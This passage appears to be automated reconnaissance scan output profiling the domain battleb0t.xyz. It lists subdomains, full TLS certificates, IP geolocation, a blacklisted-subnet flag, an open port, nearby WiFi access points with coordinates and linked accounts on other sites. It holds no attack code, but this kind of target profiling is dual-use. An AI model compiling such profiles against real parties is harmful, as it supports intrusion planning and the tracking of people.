standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1694x953 components 3"- [targetUID: 00000000-00002580]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00002580]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002580]\n "~DF479B344953954C5B.TMP" has type "data"- Location: [%TEMP%\\~DF479B344953954C5B.TMP]- [targetUID: 00000000-00002580]\n "~DF230A55C5ABF3CB5A.TMP" has type "data"- Location: [%TEMP%\\~DF230A55C5ABF3CB5A.TMP]- [targetUID: 00000000-00002580]\n "~DF1354A31362CFF700.TMP" has type "data"- Location: [%TEMP%\\~DF1354A31362CFF700.TMP]- [targetUID: 00000000-00002580]\n "~DFE53B5C5F3CC72065.TMP" has type "data"- Location: [%TEMP%\\~DFE53B5C5F3CC72065.TMP]- [targetUID: 00000000-0 | 185.199.108.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Junxion_Box (Net ID: 00:02:6F:3A:FE:C3) | 37.7642, -122.3993 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.237): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Geocaching (Category: social)
https://www.geocaching.com/p/?u=Altpapier | Altpapier |
| 2023-05-12 02:50:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | panel.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:10:8b:16:97:4c:80:e7:56:d7:06:74:1e:45:16:d2:cf:08
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 13:27:58 2022 GMT
Not After : Mar 18 13:27:57 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ad:62:80:b3:4a:16:3f:d1:ca:02:76:24:cc:9e:
aa:84:81:39:ce:32:30:eb:2b:8e:c4:10:85:04:e9:
19:e1:2c:8b:f7:58:3e:cb:1c:ff:b5:a4:5e:3a:d3:
5f:cd:9f:7e:93:67:29:42:61:bd:af:c4:d3:ff:2c:
ba:88:7a:06:b8:ee:d1:0b:bb:86:7e:44:8f:c8:6e:
9f:15:1a:80:a4:23:08:22:e4:47:13:58:3b:f2:14:
1e:d6:ab:b0:0d:9a:3d:43:fa:19:c7:62:73:68:d3:
e8:e2:e0:f2:f8:19:08:fa:27:87:9f:f6:00:ca:15:
68:32:25:1a:17:ab:c2:10:cf:ee:c4:5c:e1:5a:4c:
7f:24:75:c4:d7:a8:bb:65:e9:41:ed:b3:2d:c0:d3:
43:15:31:0d:92:7c:15:d2:74:91:60:11:b3:a9:c4:
23:1e:bd:9f:cd:65:52:70:48:15:e3:b8:f4:be:c0:
7b:19:6d:7b:06:84:b9:fd:58:0b:97:47:76:a2:75:
8a:02:5c:f4:a0:74:5a:14:c3:00:00:11:33:ca:09:
cb:4f:f9:83:06:46:d2:9c:09:dd:c0:9e:5b:21:5b:
9d:26:54:f2:ef:8a:39:ff:fb:2e:d5:3b:31:32:7d:
8d:f4:d5:b5:c2:47:2c:44:11:4c:77:93:b1:be:73:
3c:fd:f8:ad:ee:38:c8:cc:7c:fd:93:89:87:7c:f1:
ff:7e:d9:02:fc:16:a4:8b:6d:44:ce:9d:18:99:9a:
80:ce:7f:84:4a:5f:f2:64:78:f3:c5:e5:c6:c7:66:
3e:15:14:9a:10:d3:79:7b:53:46:72:6c:1d:43:1a:
b1:35:e5:15:1e:25:f5:a3:42:b9:f7:c3:cc:11:45:
0d:91:92:d0:7c:af:f5:38:d6:f6:5b:a6:85:e8:1b:
87:47:00:ae:a6:0b:b0:8b:45:d2:80:d3:a6:4d:e2:
fe:d5:6d:a5:c3:c6:cb:5d:f4:1c:79:c6:67:7f:4c:
cd:e5:9e:5e:f5:60:0e:99:47:13:b5:ed:4f:e1:0e:
26:01:e6:84:00:6a:80:a9:fd:0c:5d:16:61:ba:be:
ee:5f:41:8c:41:20:95:45:47:52:41:85:d1:cc:b2:
ba:00:26:e3:48:1b:65:5b:e0:7a:f5:04:7c:c4:32:
1f:ac:c5:99:05:ef:49:b1:5a:de:e3:c4:60:e2:03:
33:84:8a:7a:ad:eb:d2:0c:0c:ff:c4:c2:64:33:29:
15:c7:0a:73:e3:0f:ee:4a:08:a2:6b:f1:e4:95:67:
2f:52:99:fd:3e:6c:01:2d:31:33:10:f6:db:5c:20:
7c:3b:ba:79:4b:c3:c0:d7:a8:e3:f0:e3:c9:f6:e5:
3c:bf:e5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A8:1A:0A:B4:5A:C9:CB:04:98:CA:A0:D2:67:45:9B:9C:A4:98:23:12
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
9f:12:eb:4c:27:a2:ab:ae:53:fe:36:76:0d:83:48:c0:c4:51:
c2:09:08:23:27:a9:7b:35:32:d3:06:cd:e1:f3:c9:4c:2b:19:
5c:05:3a:7d:46:7b:96:78:c2:2b:09:8f:17:00:fe:1b:3e:53:
fd:3e:2f:c3:9a:b5:30:cd:5b:63:83:4a:da:77:e7:97:a3:c7:
12:1d:4e:2a:c8:68:c9:ed:8a:5e:32:c1:3c:96:1c:3b:30:00:
ed:b7:3d:b1:2e:45:01:68:3f:9d:92:c2:b8:d6:0d:29:ff:f9:
fd:d1:fa:45:c6:29:5f:fe:71:3e:28:8a:cb:d6:9d:51:d9:27:
23:c9:0e:6b:80:7d:c0:dc:b5:f6:e5:58:0d:23:ef:dc:ee:f1:
9f:7c:9d:ea:60:0a:da:5d:a8:81:7a:f0:00:9e:67:b5:ff:9a:
9e:41:d0:47:44:a3:ef:c7:76:fc:d5:d2:2e:9c:0a:d5:6e:f6:
ca:dd:e7:c4:7f:f4:80:04:e6:a2:ea:80:8a:fc:f5:3e:75:14:
53:f6:18:aa:9c:3c:71:e7:0e:04:2f:51:6f:57:cc:c7:59:90:
38:a5:63:c4:16:26:ed:1f:c8:e7:8b:d6:6e:db:f0:07:dd:4e:
a9:fa:5d:63:f8:da:5c:da:d6:9a:39:ad:eb:e5:21:56:13:72:
a3:9a:36:28
|
| 2023-05-12 02:44:13 | IP Address | No | DNS Resolver | 106 | 0 | 1 | 0 | None | 185.199.110.153 | battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Beens Gast (Net ID: 00:01:21:1C:17:B1) | 52.3759, 4.8975 |
| 2023-05-12 03:09:36 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 222.30.196.104.bc.googleusercontent.com | 104.196.30.222 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Spleen (Net ID: 00:05:4E:4F:B8:C2) | 39.0469, -77.4903 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:d7:56:4b:39:cd:63:5b:72:07:1e:ba:15:c9:f7:2c:e7:33
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 04:50:12 2023 GMT
Not After : Jul 23 04:50:11 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:82:cb:77:ee:0a:02:15:cc:55:bf:00:98:6f:a8:
3f:b2:14:d4:9c:d2:64:fd:99:e1:d8:26:89:b8:f1:
dc:22:d0:26:9d:8e:a5:23:7c:46:6d:03:ff:6a:e6:
a2:08:ce:de:84:74:8f:ae:3e:dc:7e:26:40:72:7b:
57:ec:43:06:6a:71:6c:fc:31:f4:5e:75:d1:19:14:
5e:39:a9:c9:25:dc:c7:ab:fb:78:13:e9:b6:dd:4e:
22:f5:46:61:9b:4d:92:18:51:63:9f:47:d1:e0:56:
d2:dd:ee:e2:20:b3:7b:38:70:5e:c4:ce:34:85:6e:
20:54:d9:a0:fd:9c:5b:f3:2b:f0:71:40:e4:40:4b:
1e:0f:24:1b:6d:0c:b5:2f:db:ff:c9:99:df:c5:b7:
e3:7b:82:94:fd:3b:73:58:54:64:ee:2f:77:1b:b4:
c2:f6:38:26:30:8a:32:cc:d3:34:07:56:0c:a8:1d:
b3:55:51:77:90:73:0f:96:7f:80:56:ed:10:db:b0:
4f:75:85:22:ed:37:00:ed:d3:cd:b1:63:f5:f1:51:
be:1d:fc:12:12:48:53:55:50:e7:d9:8d:97:f2:49:
cd:d8:c7:68:76:42:1f:19:5e:47:61:6c:1c:99:ed:
d8:16:c4:32:36:77:d5:1b:79:9e:1e:4e:47:15:7c:
27:6f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:EC:9F:C5:4F:26:93:D3:4A:02:0B:79:BA:BB:F3:33:18:F7:3E:35
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 24 05:50:12.941 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:BE:39:54:A0:5F:1F:10:03:FA:09:8D:
D3:C7:7F:B5:EC:4B:30:F5:03:1A:D7:13:A5:C5:6A:89:
4C:4A:74:89:42:02:20:3C:6C:13:51:09:EB:20:0E:F2:
03:2C:A0:FE:54:7F:4D:57:F9:31:F5:F6:A8:0E:A0:F4:
B8:E3:3B:F1:51:CA:99
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Apr 24 05:50:12.949 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:96:8C:23:92:33:C0:50:69:A0:CE:CA:
6D:EC:41:72:0F:3A:22:55:7C:E8:C6:CE:65:0C:82:C6:
DB:89:9C:D5:92:02:20:1D:BC:82:99:B2:08:47:68:A7:
19:FE:0E:66:64:BD:7B:34:35:F5:43:E0:B0:AB:08:2C:
AC:E8:D7:78:E2:75:5B
Signature Algorithm: sha256WithRSAEncryption
75:8f:29:3b:d2:d8:ae:b2:42:be:ce:1d:92:6f:bf:ef:e4:4b:
a2:cc:9b:be:a2:6d:3e:79:03:58:39:62:e5:65:53:10:d9:48:
8b:b1:f6:05:b6:b7:52:53:28:4f:2a:d3:20:18:d0:2e:42:4c:
67:b2:a5:67:d1:32:90:9c:d4:e9:3e:c7:a3:6d:7e:19:cf:59:
bf:8e:eb:b2:ef:a8:35:56:cf:4d:12:32:f0:20:aa:e3:fa:5b:
67:0e:ad:7e:fd:aa:d9:0f:00:58:c4:8a:ff:28:e3:56:39:39:
d5:d5:6e:f4:82:09:ef:eb:ef:8d:10:bb:e4:fd:d3:df:7f:82:
4d:1e:9a:8e:07:b9:a2:ea:90:75:6d:88:35:45:32:5e:ef:d2:
88:82:4a:b0:57:e7:ca:c5:b0:4c:c5:d9:46:e9:84:e0:a2:96:
ca:c7:58:f8:26:23:6c:6a:c5:da:2f:19:ae:92:37:d6:01:ed:
da:39:aa:b3:fd:16:7a:3d:70:fe:30:a6:ba:a8:b4:33:13:8f:
50:9b:26:ec:34:68:cd:89:95:9d:6e:0f:b9:d7:5a:5c:dd:74:
3c:28:62:ab:d4:9a:31:85:d4:70:2a:24:9e:4b:82:ea:21:71:
d0:be:45:d1:a2:3f:85:e3:48:93:ac:6c:fe:38:a0:23:13:14:
9d:51:cb:62
| battleb0t.xyz |
| 2023-05-12 02:44:11 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 1 | 0 | None | github.com | battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 6565 7375 (Net ID: 00:00:C5:D7:5E:38) | 41.8781, -87.6298 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.46): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Faktopedia (Category: images)
https://faktopedia.pl/user/login | login |
| 2023-05-12 02:57:25 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | files.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:45:27 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'172.67.168.252', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'172.67.0.0/16', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6547, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5A', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3623, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} | 172.67.168.252 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F2:68:C6) | 37.780462,-122.390564 |
| 2023-05-12 02:57:22 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | nwapi2.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:09:38 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 108.48.229.35.bc.googleusercontent.com | 35.229.48.108 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | Netlify\, Inc | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | +14806242599 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Freigut-Technik (Net ID: 00:01:21:21:C1:63) | 50.1188, 8.6843 |
| 2023-05-12 02:44:27 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Node.js | nwapi.battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL (Net ID: 00:02:CF:59:46:94) | 40.2024, 29.0398 |
| 2023-05-12 02:44:31 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nuke.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 03:32:11 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.6:443 | 188.114.97.0/24 |
| 2023-05-12 02:44:12 | SSL Certificate Host Mismatch | Yes | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | *.github.io, github.io, *.github.com, github.com, www.github.com, *.githubusercontent.com, githubusercontent.com | www.battleb0t.xyz |
| 2023-05-12 02:55:28 | Linked URL - Internal | No | URLScan.io | 0 | 0 | 2 | 0 | None | http://kekw.battleb0t.xyz/ | kekw.battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | zoom0083 (Net ID: 00:01:38:69:AF:6C) | 37.7642, -122.3993 |
| 2023-05-12 02:55:28 | Linked URL - Internal | No | URLScan.io | 0 | 0 | 2 | 0 | None | http://kekw.battleb0t.xyz/jar | kekw.battleb0t.xyz |
| 2023-05-12 03:08:47 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.221 | 104.196.30.220 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 0 | 0 | 1 | 0 | None | CN=nwapi.battleb0t.xyz | battleb0t.xyz |
